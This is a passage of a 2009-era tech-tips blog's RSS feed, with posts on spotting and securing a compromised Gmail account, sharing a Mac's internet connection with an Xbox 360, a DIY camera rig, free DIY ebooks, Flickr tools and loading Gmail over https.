<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/605/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/605/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/605/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/605/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/605/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/605/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/605/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/605/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/605/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/605/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/605/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/605/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/605/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/605/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=605&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2009/07/15/how-to-fix-slow-startups-for-firefox-3-5/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/7069c45d74815d0b9b9fcf961be64320?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">AnDyG</media:title>
		</media:content>

		<media:content url="http://bothack.files.wordpress.com/2009/07/picture-7.jpg" medium="image">
			<media:title type="html">How to fix Firefox 3.5 slow startups on Windows</media:title>
		</media:content>
	</item>
		<item>
		<title>Hack-Proofing your Gmail Account.</title>
		<link>http://bothack.wordpress.com/2009/06/30/hack-proofing-your-gmail-account/</link>
		<comments>http://bothack.wordpress.com/2009/06/30/hack-proofing-your-gmail-account/#comments</comments>
		<pubDate>Tue, 30 Jun 2009 10:35:48 +0000</pubDate>
		<dc:creator>AnDyG</dc:creator>
				<category><![CDATA[google]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[E-mail]]></category>
		<category><![CDATA[E-mail address]]></category>
		<category><![CDATA[Email]]></category>
		<category><![CDATA[Email forwarding]]></category>
		<category><![CDATA[Forwarding]]></category>
		<category><![CDATA[Gmail]]></category>
		<category><![CDATA[Web-Based]]></category>

		<guid isPermaLink="false">http://levoltz.com/?p=580</guid>
		<description><![CDATA[Do you suspect any unauthorized activity on your email account? Do you want to make it 100% hack proof? In most cases, the email id of the victim gets hacked and the victim has no clue. We might be thinking that all our confidential and private information are safe but in reality they might not [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=580&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Do you suspect any unauthorized activity on your email account? Do you want to make it 100% hack proof? In most cases, the email id of the victim gets hacked and the victim has no clue. We might be thinking that all our confidential and private information are safe but in reality they might not be.</p>
<p>Here are some signs you need to look out for unauthorized activity on your email account:</p>
<p>- Emails are <strong>forwarded to a unknown email address</strong> (check your email account settings-&gt;forwarding).</p>
<p>- The <strong>secondary email id</strong> has changed to unknown email id.</p>
<p>- New emails are marked <strong>READ</strong> even before you read it.</p>
<p>- <strong>New filters set up</strong> in your email account.</p>
<p>If you are facing any of the above-mentioned activities then, it clearly indicates that your email id has been hacked.</p>
<p><strong>Securing your Gmail id:</strong></p>
<p>Gmail has additional features like IP address logging to secure your email. So, if your account is hacked then the IP address is recorded and the next time you login, you&#8217;ll be able to see the IP address.</p>
<p><img class="aligncenter size-full wp-image-581" title="Gmail account hack" src="http://bothack.files.wordpress.com/2009/06/gmail-account-hack.png?w=500" alt="Gmail account hack"   /><br />
The above image shows the <strong>IP address of the last login</strong>. You can view the IP address of last 5 activities by clicking on Details. If the last 5 activities has any IP that doesn&#8217;t belong to you then you need to secure the email id immediately to stop further unauthorized activities.</p>
<p>The steps to follow:<br />
- Change your <strong>password</strong> (make it 8 or more alpha-numeric characters)<br />
- Change your <strong>security question</strong> <strong>and answer</strong>.<br />
- Change your <strong>Secondary email id</strong>.<br />
- Remove any <strong>unknown filters</strong>.<br />
- <strong>Disable POP3 and IMAP access</strong> to your email id.</p>
<p>This would make sure that you don&#8217;t get hacked further.</p>
<div class="zemanta-pixie" style="margin-top:10px;height:15px;"><a class="zemanta-pixie-a" title="Reblog this post [with Zemanta]" href="http://reblog.zemanta.com/zemified/7e7a3a0a-39b4-4e2b-88f7-a48f47f46e7c/"><img class="zemanta-pixie-img" style="border:medium none;float:right;" src="http://img.zemanta.com/reblog_e.png?x-id=7e7a3a0a-39b4-4e2b-88f7-a48f47f46e7c" alt="Reblog this post [with Zemanta]" /></a></div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/580/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/580/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/580/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/580/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/580/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/580/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/580/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/580/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/580/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/580/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/580/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/580/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/580/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/580/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=580&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2009/06/30/hack-proofing-your-gmail-account/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/7069c45d74815d0b9b9fcf961be64320?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">AnDyG</media:title>
		</media:content>

		<media:content url="http://bothack.files.wordpress.com/2009/06/gmail-account-hack.png" medium="image">
			<media:title type="html">Gmail account hack</media:title>
		</media:content>

		<media:content url="http://img.zemanta.com/reblog_e.png?x-id=7e7a3a0a-39b4-4e2b-88f7-a48f47f46e7c" medium="image">
			<media:title type="html">Reblog this post [with Zemanta]</media:title>
		</media:content>
	</item>
		<item>
		<title>How To Create An Internet Hub Using A Mac</title>
		<link>http://bothack.wordpress.com/2009/06/05/how-to-create-an-internet-hub-using-a-mac/</link>
		<comments>http://bothack.wordpress.com/2009/06/05/how-to-create-an-internet-hub-using-a-mac/#comments</comments>
		<pubDate>Fri, 05 Jun 2009 02:03:02 +0000</pubDate>
		<dc:creator>AnDyG</dc:creator>
				<category><![CDATA[Apple]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[airport]]></category>
		<category><![CDATA[bluetooth]]></category>
		<category><![CDATA[internet hub]]></category>
		<category><![CDATA[Internet Sharing]]></category>
		<category><![CDATA[mac]]></category>
		<category><![CDATA[wifi]]></category>
		<category><![CDATA[xbox]]></category>

		<guid isPermaLink="false">http://levoltz.com/?p=569</guid>
		<description><![CDATA[One of the most unused feature of Apple Mac OS X is the application for internet sharing that is found in System Preferences -&#62; Sharing -&#62; Internet Sharing.  This is easy to set up, doing so would allow you to share wireless wifi connection to be shared with the other systems in your vicinity. This [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=569&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>One of the most unused feature of Apple Mac OS X is the application for internet sharing that is found in System Preferences -&gt; Sharing -&gt; Internet Sharing.  This is easy to set up, doing so would allow you to share wireless wifi connection to be shared with the other systems in your vicinity. This allows you to change your Apple Mac into a wireless internet hub. This is a step by step guide to set up your Mac’s internet connection to get XBOX 360 online without buying your wireless adapter.</p>
<p>The initial step is to get familiar with the Internet Sharing application provided by Mac. As described above, navigate to Internet Sharing(option listed on the left).  Once you are on the Option page of Internet Sharing, you need to know what you exactly want to do before you proceed to turning it on. As you can see at this point, you need to pick where you want the shared connection to originate and where you are going to get the output. If you are planning to convert your Mac into a wireless internet hub, you would select</p>
<blockquote><p><em>Share your connection from: Ethernet</em></p>
<p><em>To computer using: Airport </em></p></blockquote>
<p>You can play around with any of the configurations here, like changing it from Bluetooth to Airport, Ethernet to Ethernet, etc. To enable this service, you need to check the internet sharing options checkbox in the left. Doing so, you can turn your Mac into a wireless internet hub. This works great when you are roaming and you just find a Ethernet plug but you’ve couple of laptops to connect. You can at this point create an internet hub for everyone to connect to.</p>
<p>One of the recently found feature that I like is using the Airport connection of my Macbook with my XBOX using an Ethernet connection. I’ve been doing this for a couple of times now, and this has saved me S$ 130 if I had to get myself a wireless adapter for my XBOX 360. Here is a step by step tutorial on sharing your internet connection using your Mac to get XBOX 360 online:</p>
<p>1. Enable internet sharing as shown above, in System Preferences of your Mac.  Select the sharing from Airport to Ethernet option.</p>
<p>2. Using an Ethernet cable connect your Macbook to your 360.</p>
<p>3. Goto Applications &gt; Utilities, and open Terminal application on your Mac.</p>
<p>4. Type “ifconfig eno” in the terminal.</p>
<p>5. Look for a line that shows “inet XXX.XXX.XXX.XXX” in the screen of the terminal. Make a note of this number. In my case it was 210.172.51.1</p>
<p>6. Get the IP Address of your wireless internet router from System Preferences -&gt; Network -&gt; Select Airport -&gt; Advanced -&gt; TCP/IP Tab -&gt; Router.  Note this number also. In my case it was 168.23.1.1</p>
<p>7. Go to the menu of the Network Settings once you start your XBOX 360. Now, you would have to fill in some numbers.</p>
<p>8. Enter the inet number you noted from your terminal screen against the IP Address, but note that you need to add 1 to the last digit. For instance, mine would be 210.172.51.2</p>
<p>9. Enter 255.255.255.0 against Subnet.</p>
<p>10. Enter the inet number against Router/Gateway.  Mine was 210.172.51.1</p>
<p>11. Enter the IP of your router against DNS (both primary and secondary).  Mine was 168.23.1.1</p>
<p>12. Leave PPPoE and advanced settings blank (default was off and automatic).</p>
<p>13. Test the connection and enjoy having a shared wireless internet connection to your Xbox 360 from your Apple Macbook.</p>
<p>If you need any assistance with configuration, please leave a comment to this and I’ll get back to you.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/569/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/569/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/569/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/569/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/569/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/569/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/569/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/569/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/569/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/569/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/569/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/569/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/569/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/569/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=569&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2009/06/05/how-to-create-an-internet-hub-using-a-mac/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/7069c45d74815d0b9b9fcf961be64320?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">AnDyG</media:title>
		</media:content>
	</item>
		<item>
		<title>Build Your Own Pseudo-FigRig.</title>
		<link>http://bothack.wordpress.com/2008/06/16/build-your-own-pseudo-figrig/</link>
		<comments>http://bothack.wordpress.com/2008/06/16/build-your-own-pseudo-figrig/#comments</comments>
		<pubDate>Mon, 16 Jun 2008 14:56:58 +0000</pubDate>
		<dc:creator>AnDyG</dc:creator>
				<category><![CDATA[DIY]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Photography]]></category>

		<guid isPermaLink="false">http://bothack.wordpress.com/2006/01/24/build-your-own-pseudo-figrig/</guid>
		<description><![CDATA[The Fig Rig is nice accessory for budding short film makers. The Rig is designed to provide stability while using a handheld camera. If you’ve seen the continuous 90 minute takes in Figgis’s Timecode you know what prompted him to come up with this contraption. The Rig is pretty costly around $300-$400. But DIVXUSER has [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=45&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>The Fig Rig is nice accessory for budding short film makers. The Rig is designed to provide stability while using a handheld camera. If you’ve seen<img src="http://www.geocities.com/amjoyce2004/15.jpg" alt="Fig-Rig" align="right" /> the continuous 90 minute takes in Figgis’s Timecode you know what prompted him to come up with this contraption. The Rig is pretty costly around $300-$400. But <a href="http://www.dvxuser.com/">DIVXUSER</a> has the right tutorial for you to make your own FigRig</p>
<blockquote><p>The basic idea is clever since it allows one-handed operation for low angles like skateboarding or many two-handed tricks like swoops, quick pivots, dutch angles, &#8220;steadycam&#8221; follow shots, upside-down transitions, and whatever crazy stuff you can imagine.<br />
You can attach lights, a mic, zoom/focus controller (vital!), and other things.</p></blockquote>
<p>He used an old steering wheel, a piece of aluminum plate and a wooden dowel. It isn’t that pretty to look at, but it definitely didn’t cost him $300 and it works pretty well too. Notice how this one has the full handle under the plate like the original FigRig prototype. It allows for stability and extra control of the rig. Now, you don&#8217;t always have to put you hands on the sides.</p>
<p><a href="http://www.dvxuser.com/V3/showpost.php?p=321412&amp;postcount=17">DIY FigRig</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/45/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/45/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/45/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/45/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/45/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/45/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/45/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/45/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/45/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/45/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=45&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2008/06/16/build-your-own-pseudo-figrig/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/7069c45d74815d0b9b9fcf961be64320?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">AnDyG</media:title>
		</media:content>

		<media:content url="http://www.geocities.com/amjoyce2004/15.jpg" medium="image">
			<media:title type="html">Fig-Rig</media:title>
		</media:content>
	</item>
		<item>
		<title>Free DIY eBook</title>
		<link>http://bothack.wordpress.com/2008/05/26/free-diy-ebook/</link>
		<comments>http://bothack.wordpress.com/2008/05/26/free-diy-ebook/#comments</comments>
		<pubDate>Mon, 26 May 2008 10:23:44 +0000</pubDate>
		<dc:creator>appkumar</dc:creator>
				<category><![CDATA[DIY]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Hacks]]></category>

		<guid isPermaLink="false">http://bothack.wordpress.com/2006/02/26/free-diy-ebook/</guid>
		<description><![CDATA[Project Gutenberg offers 2 free ebooks for the geek in you. &#8220;Things to Make&#8221; &#8211; by Archibald Williams and &#8220;The Boy Mechanic: Volume 1&#8243; &#8211; by popular Mechnics. Both books provide many interesting projects including carpentry, fitting, machinery, planes, gliders, steam engines and a lot more with neat explaination and diagrams/sketchs to help you. They [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=94&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.gutenberg.org/">Project Gutenberg</a> offers 2 free ebooks for the geek in you. &#8220;Things to Make&#8221; &#8211; by Archibald Williams and &#8220;The Boy Mechanic: Volume 1&#8243; &#8211; by popular Mechnics.</p>
<p><img src="http://www.makezine.com/blog/popmech.jpg" alt="boymech" width="111" height="80" /> <img src="http://www.makezine.com/blog/img413_183.jpg" alt="thingsmake" width="101" height="80" /></p>
<p>Both books provide many interesting projects including carpentry, fitting, machinery, planes, gliders, steam engines and a lot more with neat explaination and diagrams/sketchs to help you. They introduce you to a lot of hacks and mods in day to day life. Though the books were published in the 1910s and 1920s, it still makes for an interesting read. And mods will be mods, thats something that the book will make you realize.</p>
<p>The site offers you PDF, text as well as DOC format. Two of the best books you can download for free, for your holiday projects.</p>
<p><a href="http://www.gutenberg.org/etext/14664">Things to Make</a></p>
<p><a href="http://www.gutenberg.org/etext/12655">The Boy Mechanic </a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/94/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/94/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/94/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=94&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2008/05/26/free-diy-ebook/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0d1a2f21af85f7bb20b35a7622741410?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">appkumar</media:title>
		</media:content>

		<media:content url="http://www.makezine.com/blog/popmech.jpg" medium="image">
			<media:title type="html">boymech</media:title>
		</media:content>

		<media:content url="http://www.makezine.com/blog/img413_183.jpg" medium="image">
			<media:title type="html">thingsmake</media:title>
		</media:content>
	</item>
		<item>
		<title>Flickr Hacks</title>
		<link>http://bothack.wordpress.com/2008/05/20/flickr-hacks/</link>
		<comments>http://bothack.wordpress.com/2008/05/20/flickr-hacks/#comments</comments>
		<pubDate>Tue, 20 May 2008 15:39:40 +0000</pubDate>
		<dc:creator>appkumar</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Round Up]]></category>

		<guid isPermaLink="false">http://bothack.wordpress.com/2006/02/25/flickr-hacks/</guid>
		<description><![CDATA[Flickr is almost certainly the best online photo management and sharing application in the world. Flickr Hacks expands the fun and the utility of Flickr by customizing this cutting-edge technology to your very need. Quick Online Tips has a very huge list of such hacks with a 2 line review on each hack. Many of [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=92&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span><strong>Flickr</strong> is almost certainly the best online photo management and sharing application  in the world. </span><span><strong>Flickr Hacks</strong> expands the fun and the utility of <strong>Flickr</strong> by customizing this cutting-edge technology to your very need. <a href="http://pchere.blogspot.com/" target="_blank">Quick Online Tips</a> has a very huge list of such hacks with a 2 line review on each hack. Many of those hacks are very interesting and will sure enough enhance your experience with Flickr.</span></p>
<blockquote>
<ul>
<li><a href="http://sourceforge.net/projects/flickrfs">Flickrfs Virtual Flickr Filesystem</a> &#8211; Create a virtual userspace filesystem which allows easy uploading/downloading/searching of images through flickr.</li>
<li><a href="http://www.pohflepp.de/flickr.html">Projects on the construction of identity and flickr</a> &#8211; a series of three projects investigating what constitutes the self. egoshotr,  fixr and mixrrr</li>
<li><a href="http://tantannoodles.com/toolkit/wp-flickr-post-bar/">WordPress Flickr Post Bar plugin</a> &#8211; easily insert your Flickr photos into your blog posts.</li>
<li><a href="http://drewish.com/projects/phlickr/">Phlickr</a> &#8211; is an open source PHP5 based api kit used to access the Flickr API.</li>
<li><a href="http://www.astec.ac.uk/staff/shepherd/flickr_autodownloadr.html">Flickr AutoDownloadr</a> &#8211; view Flickr photos in a fullscreen slideshow (Windows). Handy for showing off photos to a group of friends with a laptop and TV.</li>
<li><a href="http://flickratr.makeshift.com/">Flickratr</a> &#8211; vote from 1-10 for different flickr images.</li>
<li><a href="http://www.beckysweb.co.uk/sudoku/flickrsudoku.asp">Flickr Soduku</a> &#8211; play soduku with flickr images.</li>
<li><a href="http://kflickr.sourceforge.net/">KFlickr</a> &#8211; A standalone Flickr.com uploader for KDE</li>
</ul>
</blockquote>
<p>And while you are at it, check out gtalkr, flickrball and wickr</p>
<p><a href="http://pchere.blogspot.com/2005/03/great-flickr-tools-collection.html" target="_blank">The Great  Flickr Tools Collection</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/92/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/92/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/92/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=92&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2008/05/20/flickr-hacks/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0d1a2f21af85f7bb20b35a7622741410?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">appkumar</media:title>
		</media:content>
	</item>
		<item>
		<title>How To: Load Gmail Faster</title>
		<link>http://bothack.wordpress.com/2008/04/26/load-gmail-faster/</link>
		<comments>http://bothack.wordpress.com/2008/04/26/load-gmail-faster/#comments</comments>
		<pubDate>Sat, 26 Apr 2008 23:58:51 +0000</pubDate>
		<dc:creator>aswinanand</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[quick bytes]]></category>

		<guid isPermaLink="false">http://bothack.wordpress.com/2007/06/17/load-gmail-faster/</guid>
		<description><![CDATA[Hi guys, of late, gmail has been loading very slowly for me. This means that, when ever I give my username and password at the login screen, after successful login, the screenshot shown below displays. [Click to see a bigger version] When that happens we hate to wait for infinitely long times. So, I discovered [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=522&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hi guys, of late, gmail has been loading very slowly for me. This means that, when ever I give my username and password at the login screen, after successful login, the screenshot shown below displays.</p>
<p><a href="http://bothack.files.wordpress.com/2007/06/g1.jpg" title="Gmail Loads Slowly"><img src="http://bothack.files.wordpress.com/2007/06/g1.thumbnail.jpg?w=500" alt="Gmail Loads Slowly" /></a><br />
[Click to see a bigger version]</p>
<p>When that happens we hate to wait for infinitely long times. So, I discovered a simple hack through which you can eliminate that screen.</p>
<p>Notice that the address bar contains the URL of the format http://mail.google.com/mail?auth=DQAA etc.</p>
<p>Now, all you have to do is, change the &#8220;http://&#8221; in your browser&#8217;s address bar to &#8220;https://&#8221;, which means the URL will now look like https://mail.google.com/mail?auth=DQAA etc. Press Enter. Gmail loads faster.</p>
